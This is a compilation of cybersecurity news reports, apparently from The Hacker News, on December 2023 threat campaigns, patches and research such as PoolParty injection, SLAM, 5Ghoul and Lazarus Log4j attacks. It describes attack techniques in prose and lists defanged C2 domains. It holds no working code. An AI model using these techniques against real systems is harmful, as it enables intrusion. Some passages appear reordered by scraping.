One such adversary is Storm-1283, which has leveraged a compromised user account to create an OAuth application and deploy VMs for cryptomining. Furthermore, the attackers modified existing OAuth applications to the account had access to by adding an extra set of credentials to facilitate the same goals.
In another instance, an unidentified actor compromised user accounts and created OAuth applications to maintain persistence and to launch email phishing attacks that employ an adversary-in-the-middle (AiTM) phishing kit to plunder session cookies from their targets and bypass authentication measures.
"In some cases, following the stolen session cookie replay activity, the actor leveraged the compromised user account to perform BEC financial fraud reconnaissance by opening email attachments in Microsoft Outlook Web Application (OWA) that contain specific keywords such as 'payment' and 'invoice," Microsoft said.
Other scenarios detected by the tech giant following the theft of session cookies involve the creation of OAuth applications to distribute phishing emails and conduct large-scale spamming activity. Microsoft is tracking the latter as Storm-1286.
To mitigate the risks associated with such attacks, it's recommended that organizations enforce multi-factor authentication (MFA), enable conditional access policies, and routinely audit apps and consented permissions.
Major Cyber Attack Paralyzes Kyivstar - Ukraine's Largest Telecom Operator
13.12.23 BigBrothers The Hacker News
Ukraine's biggest telecom operator Kyivstar has become the victim of a "powerful hacker attack," disrupting customer access to mobile and internet services.
"The cyberattack on Ukraine's #Kyivstar telecoms operator has impacted all regions of the country with high impact to the capital, metrics show, with knock-on impacts reported to air raid alert network and banking sector as work continues to restore connectivity," NetBlocks said in a series of posts on X (formerly Twitter).
Kyivstar, which is owned by Dutch-domiciled multinational telecommunication services company VEON, serves nearly 25 million mobile subscribers and more than 1 million home internet customers.
The company said the attack was "a result of" the war with Russia and that it has notified law enforcement and special state services. While Kyivstar is working to restore the services, the internet watchdog noted that the telco is largely offline.
That said, Kyivstar has yet to provide details about the nature of the attacks and what caused the shutdown. There is no evidence that the personal data of subscribers has been compromised in the incident.
"After stabilizing the network, all subscribers and corporate clients who as a result of a hacking attack could not use the services of the company, will definitely receive compensation," Kyivstar said in an update posted on Facebook.
Source: NetBlocks
It's also urging users to be on the lookout for scams aiming to trick users into sharing their personal details and that "news about compensation and the timing of the network restoration will come exclusively from the company's official pages."
The pro-Russia hacktivist group KillNet claimed responsibility for the attack on Telegram, but did not offer any additional evidence to back its claims.
KillNet is coming off a few chaotic weeks of its own after the Russia-based Gazeta.ru unmasked the real-world identity of its leader — who goes by the online alias KillMilk — as Nikolai Serafimov, a 30-year-old Russian citizen.
KillMilk has since announced his retirement, appointing in his place a new head named "Deanon Club," who has claimed that "there will be a large-scale recruitment for the KillNet team, on all fronts" with the goal of striking government financial facilities, encryption firms, and the gambling sector.
The development also comes as the Defence Intelligence of Ukraine (GUR) revealed that it hacked into Russia's Federal Taxation Service (FNS) servers and wiped all its data.. Office.ed-it.ru, a Russian IT company that served as a database for the FNS, was also reportedly affected by the attack.
"During the special operation, military intelligence officers managed to infiltrate one of the well-protected key central servers of the Federal Tax Service (FTS of the Russian Federation), and then more than 2300 of its regional servers throughout Russia, as well as on the territory of the temporarily occupied Crimea," the agency said.
Last month, GUR announced that it was behind a cyber assault against the Russian government's Federal Air Transport Agency (FATA), which is also known as Rosaviatsia. The attack allowed it to access “a large volume of confidential documents,” including a list of daily reports spanning more than a year and a half, it said.
However, Anton Gorelkin, a Russian politician and lawmaker, said in a message on Telegram that the attack on FNS is fiction, adding it is an attempt on part of the Ukrainian government to "respond to their problems with Kyivstar."
Microsoft's Final 2023 Patch Tuesday: 33 Flaws Fixed, Including 4 Critical
13.12.23 Vulnerebility The Hacker News
Microsoft released its final set of Patch Tuesday updates for 2023, closing out 33 flaws in its software, making it one of the lightest releases in recent years.
Of the 33 shortcomings, four are rated Critical and 29 are rated Important in severity. The fixes are in addition to 18 flaws Microsoft addressed in its Chromium-based Edge browser since the release of Patch Tuesday updates for November 2023.
According to data from the Zero Day Initiative, the software giant has patched more than 900 flaws this year, making it one of the busiest years for Microsoft patches. For comparison, Redmond resolved 917 CVEs in 2022.
While none of the vulnerabilities are listed as publicly known or under active attack at the time of release, some of the notable ones are listed below -
CVE-2023-35628 (CVSS score: 8.1) - Windows MSHTML Platform Remote Code Execution Vulnerability
CVE-2023-35630 (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability
CVE-2023-35636 (CVSS score: 6.5) - Microsoft Outlook Information Disclosure Vulnerability
CVE-2023-35639 (CVSS score: 8.8) - Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2023-35641 (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability
CVE-2023-35642 (CVSS score: 6.5) - Internet Connection Sharing (ICS) Denial-of-Service Vulnerability
CVE-2023-36019 (CVSS score: 9.6) - Microsoft Power Platform Connector Spoofing Vulnerability
CVE-2023-36019 is also significant because it allows the attacker to send a specially crafted URL to the target, resulting in the execution of malicious scripts in the victim's browser on their machine.
"An attacker could manipulate a malicious link, application, or file to disguise it as a legitimate link or file to trick the victim," Microsoft said in an advisory.
Microsoft's Patch Tuesday update also plugs three flaws in the Dynamic Host Configuration Protocol (DHCP) server service that could lead to a denial-of-service or information disclosure -
CVE-2023-35638 (CVSS score: 7.5) - DHCP Server Service Denial-of-Service Vulnerability
CVE-2023-35643 (CVSS score: 7.5) - DHCP Server Service Information Disclosure Vulnerability
CVE-2023-36012 (CVSS score: 5.3) - DHCP Server Service Information Disclosure Vulnerability
The disclosure also comes as Akamai discovered a new set of attacks against Active Directory domains that use Microsoft Dynamic Host Configuration Protocol (DHCP) servers.
"These attacks could allow attackers to spoof sensitive DNS records, resulting in varying consequences from credential theft to full Active Directory domain compromise," Ori David said in a report last week. "The attacks don't require any credentials, and work with the default configuration of Microsoft DHCP server."
The web infrastructure and security company further noted the impact of the flaws can be significant as they can be exploited to spoof DNS records on Microsoft DNS servers, including an unauthenticated arbitrary DNS record overwrite, thereby enabling an actor to gain a machine-in-the-middle position on hosts in the domain and access sensitive data.
Microsoft, in response to the findings, said the "problems are either by design, or not severe enough to receive a fix," necessitating that users Disable DHCP DNS Dynamic Updates if not required and refrain from using DNSUpdateProxy.
Russian APT28 Hackers Targeting 13 Nations in Ongoing Cyber Espionage Campaign
13.12.23 APT The Hacker News
The Russian nation-state threat actor known as APT28 has been observed making use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace.
IBM X-Force is tracking the adversary under the name ITG05, which is also known as BlueDelta, Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Sednit, Sofacy, and TA422.
"The newly discovered campaign is directed against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance and diplomatic centers," security researchers Golo Mühr, Claire Zaboeva, and Joe Fasulo said.
"ITG05's infrastructure ensures only targets from a single specific country can receive the malware, indicating the highly targeted nature of the campaign."
Targets of the campaign include Hungary, Türkiye, Australia, Poland, Belgium, Ukraine, Germany, Azerbaijan, Saudi Arabia, Kazakhstan, Italy, Latvia, and Romania.
The campaign involves the use of decoys that are designed to primarily single out European entities with a "direct influence on the allocation of humanitarian aid," leveraging documents associated with the United Nations, the Bank of Israel, the U.S. Congressional Research Service, the European Parliament, a Ukrainian think tank, and an Azerbaijan-Belarus Intergovernmental Commission.
Some of the attacks have been found to employ RAR archives exploiting the WinRAR flaw called CVE-2023-38831 to propagate HeadLace, a backdoor that was first disclosed by the computer Emergency Response Team of Ukraine (CERT-UA) in attacks aimed at critical infrastructure in the country.
It's worth noting that Zscaler revealed a similar campaign named Steal-It in late September 2023 that enticed targets with adult-themed content to trick them into parting with sensitive information.
The disclosure comes a week after Microsoft, Palo Alto Networks Unit 42, and Proofpoint detailed the threat actor's exploitation of a critical security flaw of Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) to gain unauthorized access to victims' accounts within Exchange servers.
The reliance on official documents as lures, therefore, marks a deviation from previously observed activity, "indicative of ITG05's increased emphasis on a unique target audience whose interests would prompt interaction with material impacting emerging policy creation."
"It is highly likely the compromise of any echelon of global foreign policy centers may aid officials' interests with advanced insight into critical dynamics surrounding the International Community's (IC) approach to competing priorities for security and humanitarian assistance," the researchers said.
The development also follows a new advisory in which CERT-UA linked the threat actor known as UAC-0050 to a massive email-based phishing attack against Ukraine and Poland using Remcos RAT and Meduza Stealer.
New MrAnon Stealer Malware Targeting German Users via Booking-Themed Scam
12.12.23 Virus The Hacker News
A phishing campaign has been observed delivering an information stealer malware called MrAnon Stealer to unsuspecting victims via seemingly benign booking-themed PDF lures.
"This malware is a Python-based information stealer compressed with cx-Freeze to evade detection," Fortinet FortiGuard Labs researcher Cara Lin said. "MrAnon Stealer steals its victims' credentials, system information, browser sessions, and cryptocurrency extensions."
There is evidence to suggest that Germany is the primary target of the attack as of November 2023, owing to the number of times the downloader URL hosting the payload has been queried.
Masquerading as a company looking to book hotel rooms, the phishing email bears a PDF file that, upon opening, activates the infection by prompting the recipient to download an updated version of Adobe Flash.
Doing so results in the execution of .NET executables and PowerShell scripts to ultimately run a pernicious Python script, which is capable of gathering data from several applications and exfiltrating it to a public file-sharing website and the threat actor's Telegram channel.
It's also capable of capturing information from instant messaging apps, VPN clients, and files matching a desired list of extensions.
MrAnon Stealer is offered by the authors for $500 per month (or $750 for two months), alongside a crypter ($250 per month) and a stealthy loader ($250 per month).
"The campaign initially disseminated Cstealer in July and August but transitioned to distributing MrAnon Stealer in October and November," Lin said. "This pattern suggests a strategic approach involving the continued use of phishing emails to propagate a variety of Python-based stealers."
The disclosure comes as the China-linked Mustang Panda is behind a spear-phishing email campaign targeting the Taiwanese government and diplomats with an aim to deploy SmugX, a new variant of the PlugX backdoor that was previously uncovered by Check Point in July 2023.
Apple Releases Security Updates to Patch Critical iOS and macOS Security Flaws
12.12.23 OS The Hacker News
Apple on Monday released security patches for iOS, iPadOS, macOS, tvOS, watchOS, and Safari web browser to address multiple security flaws, in addition to backporting fixes for two recently disclosed zero-days to older devices.
This includes updates for 12 security vulnerabilities in iOS and iPadOS spanning AVEVideoEncoder, ExtensionKit, Find My, ImageIO, Kernel, Safari Private Browsing, and WebKit. macOS Sonoma 14.2, for its part, resolves 39 shortcomings, counting six bugs impacting the ncurses library.
Notable among the flaws is CVE-2023-45866, a critical security issue in Bluetooth that could allow an attacker in a privileged network position to inject keystrokes by spoofing a keyboard.
The vulnerability was disclosed by SkySafe security researcher Marc Newlin last week. It has been remediated in iOS 17.2, iPadOS 17.2, and macOS Sonoma 14.2 with improved checks, the iPhone maker said.
Also released by Apple is Safari 17.2, containing fixes for two WebKit flaws – CVE-2023-42890 and CVE-2023-42883 – that could lead to arbitrary code execution and a denial-of-service (DoS) condition. The update is available for Macs running macOS Monterey and macOS Ventura.
iOS 17.2 and iPadOS 17.2, besides addressing a Siri bug that could allow an adversary with physical access to obtain sensitive data, packs in a security upgrade in the form of Contact Key Verification, which ensures privacy of iMessage conversations by enabling users to verify the contacts they are communicating with.
"iMessage Contact Key Verification advances the state of the art of Key Transparency deployments by having user devices themselves verify consistency proofs and ensure consistency of the KT system across all user devices for an account," Apple noted in a technical explainer in October 2023.
"These improvements protect against key directory compromise as well as compromise of the transparency service itself, and can detect split views presented by both services."
Coinciding with the updates, Apple has also released iOS 16.7.3 and iPadOS 16.7.3 to close out as many as eight security issues, two of which relate to WebKit (CVE-2023-42916 and CVE-2023-42917) and were disclosed by Redmond as having been actively exploited in the wild earlier this month.
Both the vulnerabilities have been patched in tvOS 17.2 and watchOS 10.2 as well. No additional details are available as yet regarding the nature of the exploitation and the threat actors that may be using them.
New Critical RCE Vulnerability Discovered in Apache Struts 2 - Patch Now
12.12.23 Vulnerebility The Hacker News
Apache has released a security advisory warning of a critical security flaw in the Struts 2 open-source web application framework that could result in remote code execution.
Tracked as CVE-2023-50164, the vulnerability is rooted in a flawed "file upload logic" that could enable unauthorized path traversal and could be exploited under the circumstances to upload a malicious file and achieve execution of arbitrary code.
Struts is a Java framework that uses the Model-View-Controller (MVC) architecture for building enterprise-oriented web applications.
Steven Seeley of Source Incite has been credited with discovering and reporting the flaw, which impacts the following versions of the software -
Struts 2.3.37 (EOL)
Struts 2.5.0 - Struts 2.5.32, and
Struts 6.0.0 - Struts 6.3.0
Patches for the bug are available in versions 2.5.33 and 6.3.0.2 or greater. There are no workarounds that remediate the issue.
"All developers are strongly advised to perform this upgrade," the project maintainers said in an advisory posted last week. "This is a drop-in replacement and upgrade should be straightforward."
While there is no evidence that the vulnerability is being maliciously exploited in real-world attacks, a prior security flaw in the software (CVE-2017-5638, CVSS score: 10.0) was weaponized by threat actors to breach consumer credit reporting agency Equifax in 2017.
Researchers Unmask Sandman APT's Hidden Link to China-Based KEYPLUG Backdoor
11.12.23 APT The Hacker News
Tactical and targeting overlaps have been discovered between the enigmatic advanced persistent threat (APT) called Sandman and a China-based threat cluster that's known to use a backdoor known as KEYPLUG.
The assessment comes jointly from SentinelOne, PwC, and the Microsoft Threat Intelligence team based on the fact that the adversary's Lua-based malware LuaDream and KEYPLUG have been determined to cohabit "in the same victim networks.
Microsoft and PwC are tracking the activity under the names Storm-0866 and Red Dev 40, respectively.
"Sandman and Storm-0866/Red Dev 40 share infrastructure control and management practices, including hosting provider selections, and domain naming conventions, the companies said in a report shared with The Hacker News.
"The implementation of LuaDream and KEYPLUG reveals indicators of shared development practices and overlaps in functionalities and design, suggesting shared functional requirements by their operators."
Sandman was first exposed by SentinelOne in September 2023, detailing its attacks on telecommunication providers in the Middle East, Western Europe, and South Asia using a novel implant codenamed LuaDream. The intrusions were recorded in August 2023.
Storm-0866/Red Dev 40, on the other hand, refers to an emerging APT cluster primarily singling out entities in the Middle East and the South Asian subcontinent, including telecommunication providers and government entities.
One of the key tools in Storm-0866's arsenal is KEYPLUG, a backdoor that was first disclosed by Google-owned Mandiant as part of attacks mounted by the China-based APT41 (aka Brass Typhoon or Barium) actor to infiltrate six U.S. state government networks between May 2021 and February 2022.
In a report published earlier this March, Recorded Future attributed the use of KEYPLUG to a Chinese state-sponsored threat activity group it's tracking as RedGolf, which it said "closely overlaps with threat activity reported under the aliases of APT41/BARIUM."
"A close examination of the implementation and C2 infrastructure of these distinct malware strains revealed indicators of shared development as well as infrastructure control and management practices, and some overlaps in functionalities and design, suggesting shared functional requirements by their operators," the companies pointed out.
One of the notable overlaps is are two LuaDream C2 domains named "dan.det-ploshadka[.]com" and "ssl.e-novauto[.]com," which has also been put to use as a KEYPLUG C2 server and which has been tied to Storm-0866.
Another interesting commonality between LuaDream and KEYPLUG is that both the implants support QUIC and WebSocket protocols for C2 communications, indicating common requirements and the likely presence of a digital quartermaster behind the coordination.
"The order in which LuaDream and KEYPLUG evaluate the configured protocol among HTTP, TCP, WebSocket, and QUIC is the same: HTTP, TCP, WebSocket, and QUIC in that order," the researchers said. "The high-level execution flows of LuaDream and KEYPLUG are very similar."
The adoption of Lua is another sign that threat actors, both nation-state aligned and cybercrime-focused, are increasingly setting their sights on uncommon programming languages like DLang and Nim to evade detection and persist in victim environments for extended periods of time.
Lua-based malware, in particular, have been spotted only a handful of times in the wild over the past decade. This includes Flame, Animal Farm (aka SNOWGLOBE), and Project Sauron.
"There are strong overlaps in operational infrastructure, targeting, and TTPs associating the Sandman APT with China-based adversaries using the KEYPLUG backdoor, STORM-0866/Red Dev 40 in particular," the researchers said. "This highlights the complex nature of the Chinese threat landscape."
Lazarus Group Using Log4j Exploits to Deploy Remote Access Trojans
11.12.23 APT The Hacker News
The notorious North Korea-linked threat actor known as the Lazarus Group has been attributed to a new global campaign that involves the opportunistic exploitation of security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts.
Cisco Talos is tracking the activity under the name Operation Blacksmith, noting the use of three DLang-based malware families, including a RAT called NineRAT that leverages Telegram for command-and-control (C2), DLRAT, and a downloader dubbed BottomLoader.
The cybersecurity firm described the latest tactics of the adversary as a definitive shift and that they overlap with the cluster widely tracked as Andariel (aka Onyx Sleet or Silent Chollima), a sub-group within the Lazarus umbrella.
"Andariel is typically tasked with initial access, reconnaissance and establishing long term access for espionage in support of the North Korean government's national interests," Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura said in a technical report shared with The Hacker News.
Attack chains involve the exploitation of CVE-2021-44228 (aka Log4Shell) against publicly-accessible VMWare Horizon servers to deliver NineRAT. Some of the prominent sectors targeted include manufacturing, agriculture, and physical security.
The abuse of Log4Shell is not surprising given the fact that 2.8 percent of applications are still using vulnerable versions of the library (from 2.0-beta9 through 2.15.0) after two years of public disclosure, according to Veracode, with another 3.8% using Log4j 2.17.0, which, while not vulnerable to CVE-2021-44228, is susceptible to CVE-2021-44832.
NineRAT, first developed around May 2022, is said to have been put to use as early as March 2023 in an attack aimed at a South American agricultural organization and then again in September 2023 on a European manufacturing entity. By using a legitimate messaging service for C2 communications, the goal is to evade detection.
The malware acts as the primary means of interaction with the infected endpoint, enabling the attackers to send commands to gather system information, upload files of interest, download additional files, and even uninstall and upgrade itself.
"Once NineRAT is activated it accepts preliminary commands from the telegram based C2 channel, to again fingerprint the infected systems," the researchers noted.
"Re-fingerprinting of infected systems indicates that the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase."
Also used in the attacks after initial reconnaissance is a custom proxy tool called HazyLoad that was previously identified by Microsoft as used by the threat actor as part of intrusions weaponizing critical security flaws in JetBrains TeamCity (CVE-2023-42793, CVSS score: 9.8). HazyLoad is downloaded and executed by means of another malware called BottomLoader.
Furthermore, Operation Blacksmith has been observed delivering DLRAT, which is both a downloader and a RAT equipped to perform system reconnaissance, deploy additional malware, and retrieve commands from the C2 and execute them in the compromised systems.
"The multiple tools giving overlapping backdoor entry present Lazarus Group with redundancies in the event a tool is discovered, enabling highly persistent access," the researchers said.
The disclosure comes as the AhnLab Security Emergency Response Center (ASEC) detailed Kimsuky's use of AutoIt versions of malware such as Amadey and RftRAT and distributing them via spear-phishing attacks bearing booby-trapped attachments and links in an attempt to bypass security products.
Kimusky, also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima, is an element operating under North Korea's Reconnaissance General Bureau (RGB), which also houses the Lazarus Group.
It was sanctioned by the U.S. Treasury Department on November 30, 2023, for gathering intelligence to support the regime's strategic objectives.
"After taking control of the infected system, to exfiltrate information, the Kimsuky group installs various malware such as keyloggers and tools for extracting accounts and cookies from web browsers," ASEC said in an analysis published last week.
SpyNote: Beware of This Android Trojan that Records Audio and Phone Calls
16.10.23 OS The Hacker News
The Android banking trojan known as SpyNote has been dissected to reveal its diverse information-gathering features.
Typically spread via SMS phishing campaigns, attack chains involving the spyware trick potential victims into installing the app by clicking on the embedded link, according to F-Secure.
Besides requesting invasive permissions to access call logs, camera, SMS messages, and external storage, SpyNote is known for hiding its presence from the Android home screen and the Recents screen in a bid to make it difficult to avoid detection.
"The SpyNote malware app can be launched via an external trigger," F-Secure researcher Amit Tambe said in an analysis published last week. "Upon receiving the intent, the malware app launches the main activity."
But most importantly, it seeks accessibility permissions, subsequently leveraging it to grant itself additional permissions to record audio and phone calls, log keystrokes, as well as capture screenshots of the phone via the MediaProjection API.
A closer examination of the malware has revealed the presence of what are called diehard services that aim to resist attempts, either made by the victims or by the operating system, at terminating it.
This is accomplished by registering a broadcast receiver that's designed to restart it automatically whenever it is about to be shut down. What's more, users who attempt to uninstall the malicious app by navigating to Settings are prevented from doing so by closing the menu screen via its abuse of the accessibility APIs.
"The SpyNote sample is spyware that logs and steals a variety of information, including key strokes, call logs, information on installed applications, and so on," Tambe said. "It stays hidden on the victim's device making it challenging to notice. It also makes uninstallation extremely tricky."
"The victim is eventually left only with the option of performing a factory reset, losing all data, thereby, in the process."
The disclosure comes as the Finnish cybersecurity firm detailed a bogus Android app that masquerades as an operating system update to entice targets into granting it accessibility services permissions and exfiltrate SMS and bank data.
New PoolParty Process Injection Techniques Outsmart Top EDR Solutions
11.12.23 Hacking The Hacker News
A new collection of eight process injection techniques, collectively dubbed PoolParty, could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems.
SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process injection techniques."
The findings were first presented at the Black Hat Europe 2023 conference last week.
Process injection refers to an evasion technique used to run arbitrary code in a target process. A wide range of process injection techniques exists, such as dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging.
PoolParty is so named because it's rooted in a component called Windows user-mode thread pool, leveraging it to insert any type of work item into a target process on the system.
It works by targeting worker factories – which refer to Windows objects that are responsible for managing thread pool worker threads – and overwriting the start routine with malicious shellcode for subsequent execution by the worker threads.
"Other than the queues, the worker factory that serves as the worker threads manager may be used to take over the worker threads," Leviev noted.
SafeBreach said it was able to devise seven other process injection techniques using the task queue (regular work items), I/O completion queue (asynchronous work items), and the timer queue (timer work items) based on the supported work items.
PoolParty has been found to achieve 100% success rate against popular EDR solutions, including those from CrowdStrike, Cybereason, Microsoft, Palo Alto Networks, and SentinelOne.
The disclosure arrives nearly six months after Security Joes disclosed another process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems.
"Though modern EDRs have evolved to detect known process injection techniques, our research has proven that it is still possible to develop novel techniques that are undetectable and have the potential to make a devastating impact," Leviev concluded.
"Sophisticated threat actors will continue to explore new and innovative methods for process injection, and security tool vendors and practitioners must be proactive in their defense against them."
SLAM Attack: New Spectre-based Vulnerability Impacts Intel, AMD, and Arm CPUs
10.12.23 Attack The Hacker News
Researchers from the Vrije Universiteit Amsterdam have disclosed a new side-channel attack called SLAM that could be exploited to leak sensitive information from kernel memory on current and upcoming CPUs from Intel, AMD, and Arm.
The attack is an end-to-end exploit for Spectre based on a new feature in Intel CPUs called Linear Address Masking (LAM) as well as its analogous counterparts from AMD (called Upper Address Ignore or UAI) and Arm (called Top Byte Ignore or TBI).
"SLAM exploits unmasked gadgets to let a userland process leak arbitrary ASCII kernel data," VUSec researchers said, adding it could be leveraged to leak the root password hash within minutes from kernel memory.
While LAM is presented as a security feature, the study found that it ironically degrades security and "dramatically" increases the Spectre attack surface, resulting in a transient execution attack, which exploits speculative execution to extract sensitive data via a cache covert channel.
"A transient execution attack exploits the microarchitectural side effects of transient instructions, thus allowing a malicious adversary to access information that would ordinarily be prohibited by architectural access control mechanisms," Intel says in its terminology documentation. Described as the first transient execution attack targeting future CPUs, SLAM takes advantage of a new covert channel based on non-canonical address translation that facilitates the practical exploitation of generic Spectre gadgets to leak valuable information. It impacts the following CPUs - Existing AMD CPUs vulnerable to CVE-2020-12965 AMD has also pointed to current Spectre v2 mitigations to address the SLAM exploit. Intel, on the other hand, intends to provide software guidance prior to the future release of Intel processors that support LAM. In the interim, Linux maintainers have developed patches to disable LAM by default. The findings come nearly two months after VUSec shed light on Quarantine, a software-only approach to mitigate transient execution attacks and achieve physical domain isolation by partitioning the Last level cache (LLC) to give every security domain exclusive access to a different part of the LLC with the goal of eliminating LLC covert channels. "Quarantine's physical domain isolation isolates different security domains on separate cores to prevent them from sharing corelocal microarchitectural resources," the researchers said. "Moreover, it unshares the LLC, partitioning it among the security domains."
Future Intel CPUs supporting LAM (both 4- and 5-level paging)
Future AMD CPUs supporting UAI and 5-level paging
Future Arm CPUs supporting TBI and 5-level paging
"Arm systems already mitigate against Spectre v2 and BHB, and it is considered the software's responsibility to protect itself against Spectre v1," Arm said in an advisory. "The described techniques only increase the attack surface of existing vulnerabilities such as Spectre v2 or BHB by augmenting the number of exploitable gadgets."
Researchers Unveal GuLoader Malware's Latest Anti-Analysis Techniques
9.12.23 Virus The Hacker News
Threat hunters have unmasked the latest tricks adopted by a malware strain called GuLoader in an effort to make analysis more challenging.
"While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GuLoader a time-consuming and resource-intensive process," Elastic Security Labs researcher Daniel Stepanic said in a report published this week.
First spotted in late 2019, GuLoader (aka CloudEyE) is an advanced shellcode-based malware downloader that's used to distribute a wide range of payloads, such as information stealers, while incorporating a bevy of sophisticated anti-analysis techniques to dodge traditional security solutions.
A steady stream of open-source reporting into the malware in recent months has revealed the threat actors behind it have continued to improve its ability to bypass existing or new security features alongside other implemented features.
GuLoader is typically spread through phishing campaigns, where victims are tricked into downloading and installing the malware through emails bearing ZIP archives or links containing a Visual Basic Script (VBScript) file.
Israeli cybersecurity company Check Point, in September 2023, revealed that "GuLoader is now sold under a new name on the same platform as Remcos and is implicitly promoted as a crypter that makes its payload fully undetectable by antiviruses."
One of the recent changes to the malware is an improvement of an anti-analysis technique first disclosed by CrowdStroke in December 2022 and which is centered around its Vectored Exception Handling (VEH) capability.
It's worth pointing out that the mechanism was previously detailed by both McAfee Labs and Check Point in May 2023, with the former stating that "GuLoader employs the VEH mainly for obfuscating the execution flow and to slow down the analysis."
The method "consists of breaking the normal flow of code execution by deliberately throwing a large number of exceptions and handling them in a vector exception handler that transfers control to a dynamically calculated address," Check Point said.
GuLoader is far from the only malware family to have received constant updates. Another notable example is DarkGate, a remote access trojan (RAT) that enables attackers to fully compromise victim systems.
Sold as malware-as-a-service (MaaS) by an actor known as RastaFarEye on underground forums for a monthly fee of $15,000, the malware uses phishing emails containing links to distribute the initial infection vector: a VBScript or Microsoft Software Installer (MSI) file.
Trellix, which analyzed the latest version of DarkGate (5.0.19), said it "introduces a new execution chain using DLL side-loading and enhanced shellcodes and loaders." Further, it comes with a complete rework of the RDP password theft feature.
"The threat actor has been actively monitoring threat reports to perform quick changes thus evading detections," security researchers Ernesto Fernández Provecho, Pham Duy Phuc, Ciana Driscoll, and Vinoo Thomas said.
"Its adaptability, the speed with which it iterates, and the depth of its evasion methods attest to the sophistication of modern malware threats."
The development comes as remote access trojans like Agent Tesla and AsyncRAT have been observed being propagated using novel email-based infection chains that leverage steganography and uncommon file types in an attempt to bypass antivirus detection measures.
It also follows a report from the HUMAN Satori Threat Intelligence Team about how an updated version of a malware obfuscation engine called ScrubCrypt (aka BatCloak) is being used to deliver the RedLine stealer malware.
"The new ScrubCrypt build was sold to threat actors on a small handful of dark web marketplaces, including Nulled Forum, Cracked Forum, and Hack Forums," the company said.
New 5G Modem Flaws Affect iOS Devices and Android Models from Major Brands
9.12.23 OS The Hacker News
A collection of security flaws in the firmware implementation of 5G mobile network modems from major chipset vendors such as MediaTek and Qualcomm impact USB and IoT modems as well as hundreds of smartphone models running Android and iOS.
Of the 14 flaws – collectively called 5Ghoul (a combination of "5G" and "Ghoul") – 10 affect 5G modems from the two companies, out of which three have been classified as high-severity vulnerabilities.
"5Ghoul vulnerabilities may be exploited to continuously launch attacks to drop the connections, freeze the connection that involve manual reboot or downgrade the 5G connectivity to 4G," the researchers said in a study published today.
As many as 714 smartphones from 24 brands are impacted, including those from Vivo, Xiaomi, OPPO, Samsung, Honor, Motorola, realme, OnePlus, Huawei, ZTE, Asus, Sony, Meizu, Nokia, Apple, and Google.
The vulnerabilities were disclosed by a team of researchers from the ASSET (Automated Systems SEcuriTy) Research Group at the Singapore University of Technology and Design (SUTD), who also previously uncovered BrakTooth in September 2021 and SweynTooth in February 2020.
The attacks, in a nutshell, attempt to deceive a smartphone or a 5G-enabled device to connect a rogue base station (gNB), resulting in unintended consequences. "The attacker does not need to be aware of any secret information of the target UE e.g., UE's SIM card details, to complete the NAS network registration," the researchers explained. "The attacker only needs to impersonate the legitimate gNB using the known Cell Tower connection parameters." A threat actor can accomplish this by using apps like Cellular-Pro to determine the Relative Signal Strength Indicator (RSSI) readings and trick the user equipment to connect to the adversarial station (i.e., a software-defined radio) as well as an inexpensive mini PC. Notable among the 14 flaws is CVE-2023-33042, which can permit an attacker within radio range to trigger a 5G connectivity downgrade or a denial-of-service (DoS) within Qualcomm's X55/X60 modem firmware by sending malformed Radio Resource Control (RRC) frame to the target 5G device from a nearby malicious gNB. Cybersecurity Patches have been released by both MediaTek and Qualcomm for 12 of the 14 flaws. Details of the two other vulnerabilities have been withheld due to confidentiality reasons and are expected to be disclosed in the future. "Finding issues in the implementation of the 5G modem vendor heavily impacts product vendors downstream," the researchers said, adding that "it can often take six or more months for 5G security patches to finally reach the end-user via an OTA update." "This is because the software dependency of product vendors on the Modem / Chipset Vendor adds complexity and hence delays to the process of producing and distributing patches to the end-user."
Successful exploitation of the other DoS vulnerabilities could require a manual reboot of the device to restore 5G connectivity.
N. Korea's Kimsuky Targeting South Korean Research Institutes with Backdoor Attacks
9.12.23 Virus The Hacker News
The North Korean threat actor known as Kimsuky has been observed targeting research institutes in South Korea as part of a spear-phishing campaign with the ultimate goal of distributing backdoors on compromised systems.
"The threat actor ultimately uses a backdoor to steal information and execute commands," the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last week.
The attack chains commence with an import declaration lure that's actually a malicious JSE file containing an obfuscated PowerShell script, a Base64-encoded payload, and a decoy PDF document.
The next stage entails opening the PDF file as a diversionary tactic, while the PowerShell script is executed in the background to launch the backdoor.
The malware, for its part, is configured to collect network information and other relevant data (i.e., host name, user name, and operating system version) and transmit the encoded details to a remote server.
It's also capable of running commands, executing additional payloads, and terminating itself, turning it into a backdoor for remote access to the infected host.
Kimsuky, active since at least 2012, started off targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, before expanding its victimology footprint to encompass Europe, Russia, and the U.S.
Earlier this month, the U.S. Treasury Department sanctioned Kimsuky for gathering intelligence to support North Korea's strategic objectives, including geopolitical events, foreign policy, and diplomatic efforts.
"Kimsuky has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions," cybersecurity firm ThreatMon noted in a recent report.
The state-sponsored group has also been observed leveraging booby-trapped URLs that, when clicked, download a bogus ZIP archive masquerading as an update for the Chrome browser to deploy a malicious VBScript from Google Drive that employs the cloud storage as a conduit for data exfiltration and command-and-control (C2).
Lazarus Group Goes Phishing on Telegram#
